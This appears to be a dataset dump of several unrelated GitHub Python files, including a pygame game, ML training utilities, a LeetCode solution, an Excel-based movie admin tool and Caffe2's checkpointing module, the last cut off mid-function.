\n \"\"\"\n\n url = f'https://api.instagram.com/oembed?url=http://instagr.am/p/{media}&hidecaption=true&omitscript=true'\n req = requests.get(url)\n if req.status_code == 200:\n html = req.json()['html']\n html = fix_html(html)\n\n return html\n # i = etree.fromstring(html)\n\n # obj = etree.Element('div')\n # obj.set('class', \"kazimir__embed\")\n # obj.append(i)\n # return etree.tostring(obj).decode()\n else:\n raise Exception(\n 'Failed to compile Instagram {media}: Status Code: {status}'.format(\n media=media, status=req.status_code)\n )\n\n\ndef fix_html(html: str):\n return html.replace('data-instgrm-captioned', 'data-instgrm-captioned=\"\"')\n","repo_name":"tmshv/hudozka","sub_path":"modules/sync/kazimir/InstagramToken.py","file_name":"InstagramToken.py","file_ext":"py","file_size_in_byte":3979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1661573130","text":"# can judge it's immutable or not,return True meaming for immutable\ndef fixed(o):\n try :\n hash(o)\n except TypeError:\n return False and print('False')\n return True and print('True')\n\nf1 = ('city','country',[1,2])\nf2 = ('city','country',(1,2))\n\nfixed(f1)\nfixed(f2)\n\nf1[-1].append(233)\nprint(f1)","repo_name":"DRAGONINWAVE/for_little_sun","sub_path":"mutable_tuples.py","file_name":"mutable_tuples.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"73034132213","text":"import sys\nimport re\n\n\n_VERSION_MARKER = re.compile('_py(?P\\d)')\n\n\ndef pytest_ignore_collect(path, config):\n \"\"\"\n Ignore tests that end with _pyX, where X does not equal this\n interpreter's major version.\n \"\"\"\n filename = path.basename\n modulename = filename.split('.', 1)[0]\n match = _VERSION_MARKER.search(modulename)\n return match and not int(match.group('version')) == sys.version_info[0]\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/mahmoud_boltons/boltons-master/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"4579216904","text":"import os,sys,pygame\nfrom pygame.locals import *\nimport gameobjects, config\nimport random\n\n\n\n\nclass GameState:\n \n def handle(self,event):\n if event.type == QUIT:\n sys.exit()\n if event.type == KEYDOWN and event.key == K_ESCAPE:\n sys.exit()\n \n def firstDisplay(self, screen):\n screen.fill(config.background_colour)\n pygame.display.flip()\n \n def display(self,screen):\n pass\n\nclass Level(GameState):\n def __init__(self, number = 1):\n self.number = number\n self.remaining = config.weights_per_level\n \n speed = config.drop_speed\n speed += (self.number-1) * config.speed_increase\n \n self.weight = gameobjects.Weight(speed)\n self.botley = gameobjects.Botley()\n both = self.weight, self.botley\n self.sprites = pygame.sprite.RenderUpdates(both)\n def update(self, game):\n self.sprites.update()\n \n if self.botley.touches(self.weight):\n pygame.mixer.init()\n pygame.mixer.Sound(config.soundfile).play()\n \n \n game.nextState = GameOver()\n elif self.weight.landed:\n self.weight.reset()\n sounds = random.choice(config.escapesounds)\n pygame.mixer.init()\n pygame.mixer.Sound(sounds).play()\n self.remaining -= 1\n if self.remaining == 0:\n game.nextState = LevelCleared(self.number)\n def display(self,screen):\n screen.fill(config.background_colour)\n updates = 
self.sprites.draw(screen)\n pygame.display.update(updates)\n \nclass Paused(GameState):\n \n finished = 0\n image = config.gamepaused\n # add your own text below\n text = '' \n def handle(self,event):\n GameState.handle(self, event)\n if event.type in [MOUSEBUTTONDOWN, KEYDOWN]:\n self.finished = 1\n def update(self,game):\n if self.finished:\n game.nextState = self.nextState()\n \n def firstDisplay(self,screen):\n screen.fill(config.background_colour)\n font = pygame.font.init()\n font = pygame.font.Font(None, config.font_size)\n lines = self.text.strip().splitlines()\n \n height = len(lines) * font.get_linesize()\n \n center,top = screen.get_rect().center\n top -= height // 2\n \n if self.image:\n \n image = pygame.image.load(self.image).convert()\n r = image.get_rect()\n top += r.height //2\n r.midbottom = center, top-20\n screen.blit(image,r)\n \n antialias = 1\n black = 0, 0, 0\n \n for line in lines:\n text = font.render(line.strip(), antialias, black)\n r = text.get_rect()\n r.midtop = center,top\n screen.blit(text,r)\n top += font.get_linesize()\n \n pygame.display.flip()\n \nclass Information(Paused):\n image = config.ready\n nextState = Level\n # insert whatever text you want below\n text = ''' \\n\\n'''\n pygame.mixer.init()\n pygame.mixer.Sound(config.cry).play()\nclass StartUp(Paused):\n nextState = Information\n image = config.startupimage\n text = \"zomgevadeOverlawd\\n\\n Evade the Wakoopa Overlawd, Meh Guy!\"\n \nclass LevelCleared(Paused):\n def __init__(self,number):\n self.number = number\n self.text = 'Levels cleared: %d' % self.number\n sounds2 = random.choice(config.gameoversounds)\n pygame.mixer.init()\n pygame.mixer.Sound(sounds2).play()\n \n def nextState(self): \n return Level(self.number+1)\nclass GameOver(Paused):\n \n image = config.out\n nextState = Level\n \n text = \"Aw shucks :( Click me?\"\n \nclass Game:\n def __init__(self,*args):\n path = os.path.abspath(args[0])\n dir = os.path.split(path)[0]\n os.chdir(dir) \n self.state = None\n self.nextState = StartUp()\n def run(self):\n flag = 0\n if config.full_screen:\n flag = FULLSCREEN\n screen_size = config.screen_size\n screen = pygame.display.set_mode(screen_size,flag)\n pygame.display.set_caption('LOLZORS')\n pygame.mouse.set_visible(True)\n while True:\n #if self.state != self.nextState:\n self.state = self.nextState\n self.state.firstDisplay(screen)\n for event in pygame.event.get():\n self.state.handle(event)\n self.state.update(self)\n self.state.display(screen)\n \n \n \nif __name__ == '__main__':\n game = Game(*sys.argv)\n game.run()\n","repo_name":"PrasVG/SimpleSprites","sub_path":"simplesprites.py","file_name":"simplesprites.py","file_ext":"py","file_size_in_byte":4759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9374897789","text":"#!/usr/bin/python3\n'''\nCount how many lines in the target files have zero, one, two, ... 
field\n\nArgs:\n path: path to the target file\n\nOutput:\n print the output to the terminal e.g.\n linux> python3 assertdata.py clctraining-v3/dtal-exp-GEM4-1/output/4-REMOVE-DM-RE-FS.tsv\n\n zero: 3649\n one: 0\n two: 0\n three: 0\n four: 0\n five+: 69248\n\n'''\nimport sys\n\ndef main():\n # path = '/home/alta/BLTSpeaking/ged-pm574/artificial-error/lib/tsv/ami1.train.ged.tsv'\n if len(sys.argv) != 2:\n print('Usage: python3 assertdata.py path')\n return\n\n path = sys.argv[1]\n\n zero = 0\n one = 0\n two = 0\n three = 0\n four = 0\n fivemore = 0\n with open(path) as file:\n for line in file:\n n = len(line.split())\n if n == 0:\n zero += 1\n elif n == 1:\n one += 1\n elif n == 2:\n two += 1\n elif n == 3:\n three += 1\n elif n == 4:\n four += 1\n else:\n fivemore += 1\n print(\"zero: \", zero)\n print(\"one: \", one)\n print(\"two: \", two)\n print(\"three: \", three)\n print(\"four: \", four)\n print(\"five+: \", fivemore)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"potsawee/py-tools-ged","sub_path":"assertdata.py","file_name":"assertdata.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15796390554","text":"import random\nimport numpy as np\nfrom keras import backend as K\nfrom tensorflow.keras.callbacks import Callback\nfrom sklearn.metrics import f1_score, recall_score, precision_score\nfrom data_loader import DataLoader\n\nclass Metrics(Callback):\n def __init__(self):\n super(Callback, self).__init__()\n self.validation_data = DataLoader(1,'/content/ReplayAttackSample/valid')\n\n def on_train_begin(self, logs={}):\n self.val_f1s = []\n self.val_recalls = []\n self.val_precisions = []\n\n def on_epoch_end(self, epoch, logs={}):\n #pick randomly 100 files in Validation data to evaluate model to avoid OOM\n val_predicts = []\n val_targets = []\n idx_sample = random.sample(range(len(self.validation_data)), 50)\n for idx in idx_sample:\n val_sub_video, val_label = self.validation_data[idx] #240,320,3,10; ,1\n val_predicts.append(np.argmax(self.model.predict(val_sub_video), axis = 1)[0])\n val_targets.append(val_label[0])\n # print(val_label[0])\n # print(np.argmax(self.model.predict(val_sub_video), axis = 1)[0].astype(float))\n\n # print(np.unique(np.array(val_predicts)))\n # print(np.unique(np.array(val_targets)))\n\n _val_f1 = f1_score(val_targets, val_predicts, zero_division = 1)\n _val_recall = recall_score(val_targets, val_predicts, zero_division = 1)\n _val_precision = precision_score(val_targets, val_predicts, zero_division = 1)\n\n self.val_f1s.append(_val_f1)\n self.val_recalls.append(_val_recall)\n self.val_precisions.append(_val_precision)\n print (' — val_f1: ',_val_f1,' — val_precision: ',_val_precision, ' — val_recall: ',_val_recall)","repo_name":"kun09-tker/FaceSpoofingDetection","sub_path":"Modelling/metrics_f1.py","file_name":"metrics_f1.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74593035571","text":"from src.dataset_loaders import load_font_data\nfrom src.activation_functions import get_activation_function\nfrom src.optimization_methods import get_optimization_method\nfrom src.autoencoder import denoising_autoencoder\nfrom src.multilayer_perceptron import predict\nfrom src.utils import (\n create_image,\n deserialize_weights,\n get_batch_size,\n serialize_weights,\n)\nfrom src.noise import flipping_noise\n\nimport json\n\n\ndef main():\n 
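# load the 7x5 bitmap font set that the denoising autoencoder is trained on\n    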
data = load_font_data()\n\n # Flatten the matrix into a vector\n data = data.reshape((data.shape[0], -1))\n\n with open(\"config.json\", \"r\") as f:\n config = json.load(f)\n\n hidden_layer_sizes = config[\"hidden_layers\"]\n latent_space_size = config[\"latent_space_size\"]\n\n target_error = config[\"target_error\"]\n max_epochs = config[\"max_epochs\"]\n\n noise_probability_training = config[\"noise_probability_training\"]\n noise_probability_testing = config[\"noise_probability_testing\"]\n\n batch_size = get_batch_size(config, data.shape[0])\n\n (\n activation_function,\n activation_derivative,\n activation_normalize,\n ) = get_activation_function(\n config[\"activation\"][\"function\"], config[\"activation\"][\"beta\"]\n )\n\n optimization_method = get_optimization_method(config[\"optimization\"])\n\n if config[\"load_weights\"]:\n weights = deserialize_weights(config[\"weights_file\"])\n else:\n weights, errors_per_epoch, training_data = denoising_autoencoder(\n data,\n hidden_layer_sizes,\n latent_space_size,\n target_error,\n max_epochs,\n batch_size,\n activation_function,\n activation_derivative,\n optimization_method,\n noise_probability_training,\n )\n\n original_data = data\n testing_data = flipping_noise(data, noise_probability_testing)\n\n original_fonts = data.reshape((-1, 7, 5))\n training_fonts = training_data.reshape((-1, 7, 5))\n testing_fonts = testing_data.reshape((-1, 7, 5))\n\n create_image(original_fonts, \"original.png\", (7, 5))\n create_image(training_fonts, \"training.png\", (7, 5))\n create_image(testing_fonts, \"testing.png\", (7, 5))\n\n reconstructed_with_original_fonts = []\n reconstructed_with_training_fonts = []\n reconstructed_with_testing_fonts = []\n\n for original_sample, training_sample, testing_sample in zip(\n original_data, training_data, testing_data\n ):\n reconstructed_with_original_sample = predict(\n original_sample, weights, activation_function\n )\n reconstructed_with_training_sample = predict(\n training_sample, weights, activation_function\n )\n reconstructed_with_testing_sample = predict(\n testing_sample, weights, activation_function\n )\n\n reconstructed_with_original_font = (\n reconstructed_with_original_sample.reshape((7, 5))\n )\n reconstructed_with_training_font = (\n reconstructed_with_training_sample.reshape((7, 5))\n )\n reconstructed_with_testing_font = reconstructed_with_testing_sample.reshape(\n (7, 5)\n )\n\n reconstructed_with_original_fonts.append(reconstructed_with_original_font)\n reconstructed_with_training_fonts.append(reconstructed_with_training_font)\n reconstructed_with_testing_fonts.append(reconstructed_with_testing_font)\n\n create_image(\n reconstructed_with_original_fonts, \"reconstructed_with_original.png\", (7, 5)\n )\n create_image(\n reconstructed_with_training_fonts, \"reconstructed_with_training.png\", (7, 5)\n )\n create_image(\n reconstructed_with_testing_fonts, \"reconstructed_with_testing.png\", (7, 5)\n )\n\n if config[\"save_weights\"]:\n serialize_weights(weights, config[\"weights_file\"])\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ImNotGone/sia-tp5","sub_path":"ej1b.py","file_name":"ej1b.py","file_ext":"py","file_size_in_byte":4164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17940153865","text":"\"\"\"\nA sequence consists of integer numbers and ends with the number 0. Determine how many elements of this sequence are greater than their neighbours above. 
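In other words, count the elements that are strictly greater than the element read immediately before them.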
\n\nFor example, on input\n3\n2\n3\n1\n4\n4\n3\n0\noutput must be\n2\n\"\"\"\ncounter = 0\n\nnum1 = int(input())\nwhile True:\n num2 = int(input())\n if num2 == 0:\n break\n if num2 > num1:\n counter += 1\n num1 = num2\n\nprint(counter)\n","repo_name":"piotrpatrzylas/Repl.it","sub_path":"POP1 Part-time/Session 2 Problem 08: Number of elements greater to previous one.py","file_name":"Session 2 Problem 08: Number of elements greater to previous one.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3488564551","text":"#\n# @lc app=leetcode.cn id=76 lang=python3\n#\n# [76] 最小覆盖子串\n#\n\n# @lc code=start\nfrom collections import defaultdict\n\n\nclass Solution:\n def minWindow(self, s: str, t: str) -> str:\n\n window = defaultdict(int)\n need = defaultdict(int)\n for c in t:\n need[c] += 1\n\n valid = 0 # 表示窗口中满足need条件的字符串的字符个数\n left, right = 0, 0\n\n start = 0 # 记录找到的字符串的开始下标\n length = len(s) + 1\n\n while right < len(s):\n c = s[right]\n # 移动窗口\n right += 1\n if c in need:\n # 更新窗口里的数\n window[c] += 1\n if need[c] == window[c]:\n valid += 1\n\n # 判断左侧是不是要收缩了(当前是否已经满足条件了)\n while valid == len(need):\n # 更新最小子串\n if (right - left) < length:\n start = left\n length = right - left\n\n d = s[left]\n left += 1\n # 将最左侧的数据从window中移除\n if d in need:\n if need[d] == window[d]:\n valid -= 1\n window[d] -= 1\n if length != len(s) + 1:\n return s[start : start + length]\n return \"\"\n\n def test(self, s=\"ADOBECODEBANC\", t=\"ABC\"):\n return self.minWindow(s, t)\n\n\n# @lc code=end\n\n","repo_name":"Ehco1996/leetcode","sub_path":"labuladong/开始之前/swindow/76.最小覆盖子串.py","file_name":"76.最小覆盖子串.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"9796420963","text":"class Foo:\n @property\n def bar(self):\n \"\"\"The bar attribute\"\"\"\n return self.__dict__[\"bar\"]\n\n @bar.setter\n def bar(self, value):\n self.__dict__[\"bar\"] = value\n\n\nif __name__ == \"__main__\":\n help(Foo.bar)\n help(Foo)\n","repo_name":"tinylambda/keep","sub_path":"books/fp/ch19/ch19_12.py","file_name":"ch19_12.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"24686714041","text":"# Dependencies\nimport requests\nimport json\n\n# Google developer API key\nfrom config import api_key\n\n# Target city\ntarget_city = \"Boise, Idaho\"\n\n# Build the endpoint URL\ntarget_url = ('https://maps.googleapis.com/maps/api/geocode/json?'\n 'address={0}&key={1}').format(target_city, api_key)\n\n# Run a request to endpoint and convert result to json\ngeo_data = requests.get(target_url).json()\n\n# Print the json\nprint(geo_data)\n\n\n# Print the json (pretty printed)\nprint(json.dumps(geo_data, indent=4, sort_keys=True))\n\n# Extract latitude and longitude\nlat = geo_data[\"results\"][0][\"geometry\"][\"location\"][\"lat\"]\nlng = geo_data[\"results\"][0][\"geometry\"][\"location\"][\"lng\"]\n\n# Print the latitude and longitude\nprint('''\n City: {0}\n Latitude: {1}\n Longitude: {2}\n '''.format(target_city, lat, lng))","repo_name":"GilbyScarChest/Coding_Templates","sub_path":"Templates/API's/python-API.py","file_name":"python-API.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16132072875","text":"from 
Main_Assignment_Python_Track.ExcelUtility import ExcelUtils\nimport datetime\n\n\n\nclass WrongColumName(Exception):\n pass\n\n\nclass Admin(ExcelUtils):\n def __init__(self):\n super().__init__()\n ExcelUtils()\n\n def admin_login(self):\n\n admin_name = str(input(\"Enter the admin Username\"))\n admin_password = str(input(\"enter Password\"))\n for i in range(1, ExcelUtils.Total_row + 1):\n\n if ExcelUtils.sheet.cell(i, 1).value == admin_name:\n if ExcelUtils.sheet.cell(i, 2).value == admin_password:\n return\"Login Successful\"\n else:\n return \"wrong_Password\"\n return \"Wrong Admin_Username\"\n\n def editmovie(self):\n try:\n movie_name = str(input(\"Enter Movie name\"))\n for i in range(1, ExcelUtils.Total_main_database_row+1):\n if ExcelUtils.database.cell(i, 1).value == movie_name:\n local_dict = {\"Title\": \"A\", \"Genre\": \"B\", \"Length in hours\": \"C\", \"Cast\": \"D\", \"Director\": \"E\",\n \"Admin_rating\": \"F\", \"No_of Shows\": \"H\", \"First Show\": \"I\",\n \"Interval Time in minutes\": \"J\", \"Gap Between Shows in minutes\": \"K\", \"Capacity\": \"L\"}\n print(list(local_dict.keys()))\n editable = str(input(\"enter what you want to edit \"))\n if editable not in local_dict:\n raise WrongColumName\n edit = str(input(\"enter the edit \"))\n editing_cell = ExcelUtils.database[local_dict[editable]+f'{i}']\n editing_cell.value = edit\n ExcelUtils.workbook.save(ExcelUtils.url)\n print(f'{editable} is Edited Successfully')\n except WrongColumName:\n print(\"Please Enter Correct Column name\")\n except Exception:\n print()\n\n def add_movie(self):\n try:\n #for i in range(1, ExcelUtils.Total_main_database_row):\n print(\"Please fill the below Requirements\")\n local_dict = {\"Title\": \"A\", \"Genre\": \"B\", \"Length\": \"C\", \"Cast\": \"D\", \"Director\": \"E\",\n \"Admin_rating\": \"F\", \"No_of Shows\": \"H\", \"First Show\": \"I\",\n \"Interval Time\": \"J\", \"Gap Between Shows\": \"K\", \"Capacity\": \"L\", \"Available Seats\":\"N\"}\n for j in local_dict:\n edit = str(input(f'{j}:'))\n cell = ExcelUtils.database[f'{local_dict[j]}{ExcelUtils.Total_main_database_row + 1}']\n cell.value = edit\n ExcelUtils.workbook.save(ExcelUtils.url)\n\n print(\"Movie added Successfully\")\n except Exception:\n print(\"Something Went Wrong\")\n\n def deleteMovie(self):\n try:\n movie_name = str(input(\"Enter the Movie you want to delete\"))\n index = 0\n for i in range(1, ExcelUtils.Total_main_database_row):\n if ExcelUtils.database.cell(i, 1).value == movie_name:\n index = i\n ExcelUtils.database.delete_rows(index, 1)\n ExcelUtils.workbook.save(ExcelUtils.url)\n print(f'{movie_name} is deleted successfully')\n except Exception:\n print(\"Something Went Wrong or may movie is not present\")\n\n def calculate_timing(self):\n try:\n ExcelUtils()\n local_dict = {\"length\":\"C\", \"No_of_show\":\"H\", \"first_show\":\"I\", \"Interval time\":\"J\", \"Gap\":\"K\"}\n retained_dict={}\n for i in local_dict.keys():\n values = ExcelUtils.database[f'{local_dict[i]}{ExcelUtils.Total_main_database_row}'].value\n if values not in retained_dict:\n retained_dict[i] = values\n timing_list = []\n start_time = datetime.timedelta(hours=int(retained_dict[\"first_show\"]))\n interval_time = datetime.timedelta(hours=0 ,minutes=int(retained_dict[\"Interval time\"]))\n movie_length_list = retained_dict[\"length\"].split('.')\n movie_length = datetime.timedelta(hours=int(movie_length_list[0]), minutes=int(movie_length_list[1]))\n gap = datetime.timedelta(hours=0,minutes=int(retained_dict[\"Gap\"]))\n\n 
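# one start-end slot per show: a show spans movie length plus interval,\n            # and the next show begins only after the configured gap between shows\n            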
for i in range(0, int(float(retained_dict[\"No_of_show\"]))):\n timing_list.append(f'{start_time}-{start_time + movie_length + interval_time}')\n start_time = start_time + movie_length + interval_time + gap\n timing_list = \",\".join(map(str, timing_list))\n time_column = ExcelUtils.database[f'G{ExcelUtils.Total_main_database_row}']\n time_column.value = timing_list\n ExcelUtils.workbook.save(ExcelUtils.url)\n print(\"time slots added successfully\")\n except Exception as e:\n print(e)\n\n\n","repo_name":"prabhat-deloitte/HU_PYTHON_TRACK","sub_path":"Main_Assignment_Python_Track/Admin_Class.py","file_name":"Admin_Class.py","file_ext":"py","file_size_in_byte":4870,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"19767317362","text":"## @package checkpoint\n# Module caffe2.python.checkpoint\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport os\nimport logging\nfrom caffe2.python import core, context\nfrom caffe2.python.net_builder import ops\nfrom caffe2.python.task import Node, Task, TaskGroup, TaskOutput, WorkspaceType\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n# The name of the special net that is used to store all the blob names in the\n# workspace.\n__BLOB_NAMES_NET__ = 'get_blob_list'\n\n@context.define_context()\nclass Job(object):\n \"\"\"\n A Job defines three TaskGroups: the `init_group`, the `epoch_group` and the\n `exit_group` which will be run by a JobRunner.\n\n The `init_group` will be run only once at startup. Its role is to\n initialize globally persistent blobs such as model weights, accumulators\n and data file lists.\n\n The `epoch_group` will be run in a loop after init_group. The loop will\n exit when any of the stop signals added with `add_stop_signal` is True\n at the end of an epoch.\n\n The `exit_group` will be run only once at the very end of the job, when one\n of the stopping criterias for `epoch_group` was met. 
The role of this group\n is save the results of training in the end of the job.\n\n Jobs are context-driven, so that Tasks can be added to the active Job\n without having to explicitly pass the job object around.\n\n Example of usage:\n\n def build_reader(partitions):\n with Job.current().init_group:\n reader = HiveReader(init_reader, ..., partitions)\n Task(step=init_reader)\n with Job.current().epoch_group:\n limited_reader = ReaderWithLimit(reader, num_iter=10000)\n data_queue = pipe(limited_reader, num_threads=8)\n Job.current().add_stop_signal(limited_reader.data_finished())\n return data_queue\n\n def build_hogwild_trainer(reader, model):\n with Job.current().init_group:\n Task(step=model.param_init_net)\n with Job.current().epoch_group:\n pipe(reader, processor=model, num_threads=8)\n with Job.current().exit_group:\n Task(step=model.save_model_net)\n\n with Job() as job:\n reader = build_reader(partitions)\n model = build_model(params)\n build_hogwild_trainer(reader, model)\n \"\"\"\n def __init__(self,\n init_group=None, epoch_group=None,\n exit_group=None, stop_signals=None,\n nodes_to_checkpoint=None):\n self.init_group = init_group or TaskGroup(\n workspace_type=WorkspaceType.GLOBAL)\n self.epoch_group = epoch_group or TaskGroup()\n self.exit_group = exit_group or TaskGroup()\n self.stop_signals = stop_signals or []\n self._nodes_to_checkpoint = nodes_to_checkpoint\n\n def nodes_to_checkpoint(self):\n if self._nodes_to_checkpoint:\n return self._nodes_to_checkpoint\n else:\n return self.init_group.used_nodes()\n\n def compile(self, session_class):\n return Job(\n init_group=session_class.compile(self.init_group),\n epoch_group=session_class.compile(self.epoch_group),\n exit_group=session_class.compile(self.exit_group),\n stop_signals=self.stop_signals,\n nodes_to_checkpoint=self.nodes_to_checkpoint())\n\n def __enter__(self):\n self.epoch_group.__enter__()\n return self\n\n def __exit__(self, *args):\n self.epoch_group.__exit__()\n\n def add_stop_signal(self, output):\n if isinstance(output, core.BlobReference):\n t = Task(outputs=[output], group=self.epoch_group)\n output = t.outputs()[0]\n assert isinstance(output, TaskOutput)\n self.stop_signals.append(output)\n\n\nclass CheckpointManager(object):\n \"\"\"\n Controls saving and loading of workspaces on every epoch boundary of a job.\n If a CheckpointManager instance is passed to JobRunner, then JobRunner will\n call `init`, `read` and `save` at different moments in between epoch runs.\n \"\"\"\n def __init__(self, db, db_type):\n self._db = db\n self._db_type = db_type\n # make sure these blobs are the first in the checkpoint file.\n self._net = core.Net('!!checkpoint_mngr')\n self._blob_names = self._net.AddExternalInput('blob_names')\n self._names_output = None\n\n def init(self, nodes=None, retrieve_from_epoch=None):\n \"\"\"\n Build a Task that will be run once after the job's `init_group` is run.\n This task will determine which blobs need to be checkpointed.\n If retrieve_from_epoch is not None, then the checkpoint metadata is\n retrieved from a previously saved checkpoint.\n \"\"\"\n assert nodes is None or len(nodes) == 1, (\n 'CheckpointManager only supports single node.')\n with Task(outputs=[self._blob_names]) as task:\n if retrieve_from_epoch is None:\n ops.GetAllBlobNames(\n [],\n self._blob_names,\n include_shared=False)\n else:\n ops.Load(\n [], self._blob_names,\n db=self._db_name(retrieve_from_epoch),\n db_type=self._db_type,\n absolute_path=True)\n self._names_output = task.outputs()[0]\n return task\n\n def 
blob_list(self):\n assert self._names_output\n return self._names_output.fetch().tolist()\n\n def _db_name(self, epoch):\n return '%s.%06d' % (self._db, epoch)\n\n def load(self, epoch):\n \"\"\"\n Build a Task that will be run by JobRunner when the job is to be\n resumed from a given epoch. This task will run a Load op that will\n load and deserialize all relevant blobs from a persistent storage.\n \"\"\"\n logger.info('Load from %s' % self._db_name(epoch))\n with Task() as task:\n ops.Load(\n [],\n self.blob_list(),\n db=self._db_name(epoch),\n db_type=self._db_type,\n absolute_path=True)\n return task\n\n def load_blobs_from_checkpoint(self, blob_names, epoch):\n \"\"\"\n Builds a Task that loads only the necessary blobs from a checkpoint of\n the given epoch. The necessary blobs are given in the blob_names\n argument.\n\n Args:\n blob_names: A list of strings. Each string is the name of a\n blob.\n epoch: The checkpoint epoch to load from.\n\n Returns:\n A Task which loads the specified blobs from the checkpoint of the\n given epoch.\n \"\"\"\n logger.info('Load from %s' % self._db_name(epoch))\n with Task() as task:\n ops.Load(\n [],\n blob_names,\n db=self._db_name(epoch),\n db_type=self._db_type,\n absolute_path=True,\n allow_incomplete=True)\n return task\n\n def check_db_exists(self, epoch):\n logger.info('Check existence of %s' % self._db_name(epoch))\n with Task() as task:\n existence = ops.Const(False)\n ops.DBExists(\n [],\n [existence],\n db_name=self._db_name(epoch),\n db_type=self._db_type,\n absolute_path=True)\n task.add_output(existence)\n return task\n\n def save(self, epoch):\n \"\"\"\n Build a Task that is run once after `init_group` and after each\n epoch is run. This will execute a Save ops to serialize and persist\n blobs present in the global workspaace.\n \"\"\"\n logger.info('Save to %s' % self._db_name(epoch))\n with Task() as task:\n ops.Save(\n self.blob_list(), [], db=self._db_name(epoch),\n db_type=self._db_type, absolute_path=True)\n return task\n\n\nclass MultiNodeCheckpointManager(object):\n \"\"\"\n Coordinates checkpointing and checkpointing across multiple nodes.\n Each of `init`, `load` and `save` will build TaskGroups which will\n trigger checkpointing on each of the nodes involved in a distributed job.\n \"\"\"\n def __init__(\n self, db_prefix, db_type, node_manager_class=CheckpointManager):\n self._node_manager_class = node_manager_class\n self._node_managers = None\n self._db_prefix = db_prefix\n self._db_type = db_type\n\n def _task_group(self, func, *args, **kw):\n assert self._node_managers is not None, 'init must be called first.'\n with TaskGroup(WorkspaceType.GLOBAL) as task_group:\n for node, manager in self._node_managers:\n with Node(node):\n func(manager, *args, **kw)\n return task_group\n\n def init(self, nodes, retrieve_from_epoch=None):\n if self._node_managers is not None:\n assert [node for node, _ in self._node_managers] == nodes\n return\n self._node_managers = []\n for node in nodes:\n with Node(node):\n manager = self._node_manager_class(\n db=os.path.join(self._db_prefix, node),\n db_type=self._db_type)\n self._node_managers.append((node, manager))\n return self._task_group(\n self._node_manager_class.init,\n nodes=[node],\n retrieve_from_epoch=retrieve_from_epoch)\n\n def load(self, epoch):\n return self._task_group(self._node_manager_class.load, epoch)\n\n def load_blobs_locally(self, nodes, blob_names, epoch, session):\n \"\"\"Loads the necessary blobs from the checkpoints to the current node.\n\n Args:\n blob_names: A 
list of strings. Each string is the name of a\n blob.\n epoch: An integer. The checkpoint epoch to load from.\n session: A Session object to execute the Load ops.\n \"\"\"\n if self._node_managers is not None:\n assert [node for node, _ in self._node_managers] == nodes\n else:\n self._node_managers = []\n for node in nodes:\n with Node(node):\n manager = self._node_manager_class(\n db=os.path.join(self._db_prefix, node),\n db_type=self._db_type)\n self._node_managers.append((node, manager))\n assert self._node_managers is not None, 'must initialize node managers'\n for _, manager in self._node_managers:\n existence_task = manager.check_db_exists(epoch)\n session.run(existence_task)\n existence = existence_task.outputs()[0].fetch()\n if not existence:\n logger.info('DB %s does not exist!' % manager._db_name(epoch))\n return False\n load_task = manager.load_blobs_from_checkpoint(blob_names, epoch)\n session.run(load_task)\n logger.info('Successfully loaded from checkpoints.')\n return True\n\n def save(self, epoch):\n return self._task_group(self._node_manager_class.save, epoch)\n\n\nclass JobRunner(object):\n \"\"\"\n Implement the runtime logic for jobs with checkpointing at the level of\n epoch. Can be used to run either single-host or distributed jobs. Job\n runner is a callable to be called once from the client, passing a Session\n as argument. This call will block until the Job execution is complete.\n\n If a checkpoint_manager is passed, checkpoints will be taken after\n initialization and after each epoch execution. If, in addition,\n `resume_from_epoch` is an epoch number, the corresponding checkpoint will\n be loaded and job execution will continue from the given epoch. In\n this case, the job's init_group will not be run.\n\n Refer to checkpoint_test.py for an example.\n \"\"\"\n def __init__(self, job, checkpoint_manager=None, resume_from_epoch=None):\n self.resume_from_epoch = resume_from_epoch\n self.checkpoint = checkpoint_manager\n self.job = job\n\n def __call__(self, client):\n from_scratch = self.resume_from_epoch is None\n if from_scratch:\n client.run(self.job.init_group)\n\n if self.checkpoint:\n logger.info('Preparing checkpoint ...')\n client.run(self.checkpoint.init(\n self.job.nodes_to_checkpoint(),\n retrieve_from_epoch=self.resume_from_epoch))\n if from_scratch:\n logger.info('Saving first checkpoint ...')\n client.run(self.checkpoint.save(0))\n logger.info('First checkpoint saved.')\n else:\n logger.info('Loading checkpoint for epoch {} ...'.format(\n self.resume_from_epoch))\n client.run(self.checkpoint.load(self.resume_from_epoch))\n logger.info('Checkpoint loaded.')\n\n epoch = 1 if from_scratch else self.resume_from_epoch + 1\n while True:\n logger.info('Starting epoch %d.' % epoch)\n client.run(self.job.epoch_group)\n logger.info('Ran epoch %d.' % epoch)\n stop_signals = [o.fetch() for o in self.job.stop_signals]\n\n if self.checkpoint:\n 